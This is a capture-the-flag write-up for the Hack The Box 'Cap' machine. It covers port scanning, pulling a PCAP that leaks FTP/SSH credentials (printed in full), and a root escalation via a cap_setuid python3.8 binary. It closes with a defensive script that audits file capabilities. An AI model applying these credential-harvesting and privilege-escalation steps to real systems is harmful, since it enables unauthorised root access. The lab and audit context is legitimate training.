HTB Cap Writeup

INFO

Machine IP = 10.10.10.245
OS = Linux
Level = EASY
Points = 20

Add the machine's IP to your /etc/hosts file:

echo "10.10.10.245 cap.htb" >> /etc/hosts

Scanning

nmap -sC -sV 10.10.10.245

Enumeration

21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn

FTP (Port 21)

Anonymous FTP login is not available.

HTTP (Port 80)

http://10.10.10.245/

I found that on each reload, or each click on the Security Snapshot (5 Second PCAP + Analysis) tab, the ID variable changed, and each time the PCAP file changed too. None of them were useful, so let's try the value 0.

http://10.10.10.245/data/0

Then I downloaded the 0.PCAP file and opened it with Wireshark. Here we can find the FTP credentials, as below:

USER : nathan
PASSWORD : Buck3tH4TF0RM3!

With these credentials we are going to log in to the FTP server, where we get the first flag, user.txt.

Let’s use the same credentials for SSH:

ssh [email protected] -> with password: Buck3tH4TF0RM3!

Privilege Escalation

Here we are going to clone the linpeas.sh script and run it.

Then we found:
Files with capabilities (limited to 50):

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

This means that a process started from this binary can set its user ID to any value, including 0 (root), because the interpreter file itself carries cap_setuid.

Time for privilege escalation:

nathan@cap:~$ python3
Python 3.8.5 (default, Jan 27 2021, 15:41:15) 
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.system("/bin/bash")
root@cap:~#
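
To find this class of misconfiguration across a host, the following added example (not part of the original writeup) parses `getcap -r /` output in both libcap formats and flags files whose permitted set includes a privilege-granting capability. The capability list, the interpreter name list and the sample lines are assumptions constructed for illustration.

```python
import re

# Capabilities that allow a direct jump to root or a bypass of file permissions
# (assumed audit list, not exhaustive).
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
             "cap_fowner", "cap_setfcap"}
# Interpreters run arbitrary code under whatever capability the file grants
# (name list is an assumption; extend it for your estate).
INTERPRETER = re.compile(r"/(python|perl|ruby|php|node|lua)[\d.]*$")
# "path = caps+eip" (older libcap, as in the linpeas output) or "path caps=eip" (newer).
LINE = re.compile(
    r"^(?P<path>.+?)(?: =)? (?P<caps>[a-z0-9_,]*)(?P<op>[=+])(?P<flags>[eip]+)$")


def audit_getcap(output):
    """Return [(severity, path, [risky caps], remediation)] for `getcap -r /` output."""
    findings = []
    for line in output.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # blank lines, warnings, multi-clause entries
        # Only the permitted flag (p) hands the capability to the process on exec.
        if "p" not in m["flags"]:
            continue
        names = set(filter(None, m["caps"].split(",")))
        # An empty list or "all" means every capability.
        risky = sorted(DANGEROUS if not names or "all" in names else names & DANGEROUS)
        if not risky:
            continue
        path = m["path"]
        severity = "critical" if INTERPRETER.search(path) else "high"
        findings.append((severity, path, risky, f"setcap -r {path}"))
    return findings


# Constructed sample: the first line is the finding from this box, the rest are typical entries.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
"""

if __name__ == "__main__":
    for sev, path, caps, fix in audit_getcap(SAMPLE):
        print(f"[{sev}] {path}: {','.join(caps)} -> {fix}")
```

On a live system, feed it the output of `getcap -r / 2>/dev/null`; `setcap -r <file>` removes the file capabilities from a flagged binary.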

Done!



This post is licensed under CC BY 4.0 by the author.